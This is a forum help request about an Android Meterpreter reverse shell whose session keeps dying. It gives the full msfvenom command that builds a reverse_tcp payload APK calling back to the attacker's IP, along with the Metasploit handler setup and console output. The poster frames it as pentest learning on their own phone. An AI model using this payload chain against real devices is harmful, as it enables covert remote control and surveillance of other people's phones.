Forum Thread: Meterpreter on Android

Hi,

I'm looking for help in order to progress in my understanding of the use of Meterpreter over Android on a smartphone.

I currently have Kali 4.11 and the Metasploit suite on the attacker computer.
I also generated my Meterpreter payloadusing the following command :

msfvenom -p android/meterpreter/reverse_tcp LHOST=MY_WAN_IP_ADDRESS LPORT=4444 -a dalvik --platform android R -o /pentest-001.apk

Then I installed my payload over the Android 6.0.1 smartphone (a Lenovo P2) and I can see the MainActivity software installed.

Then, on the Attacker computer", I typed (see bold) :

msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST MY_LAN_IP_ADDRESS
LHOST => MY_LAN_IP_ADDRESS
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
* Exploit running as background job 0.

From ther, I start MainActivity on my smartphone (connected using 4G/LTE) : I can see the following being printed on the attacker computer.

msf exploit(handler) >
* Sending stage (68925 bytes) to MY_WAN_IP_ADDRESS
* Meterpreter session 1 opened (MY_LAN_IP_ADDRESS:4444 -> MY_WAN_IP_ADDRESS:11501) at 2017-08-31 13:55:56 +0200
* negotiating tlv encryption
* negotiated tlv encryption
* negotiated tlv encryption
* MY_WAN_IP_ADDRESS - Meterpreter session 1 closed. Reason: Died

I can repeat the operation on and on, I never get the Meterpreter shell. I tried on different smartphones, BTW.

One precision : my attacker computer is behind 2 routers: Both routers forward port 4444 (first one forward to 2nd router, and 2nd router forwards to MY_LAN_IP_ADDRESS)

I also tested using port 443.

Thanks in advance for your help.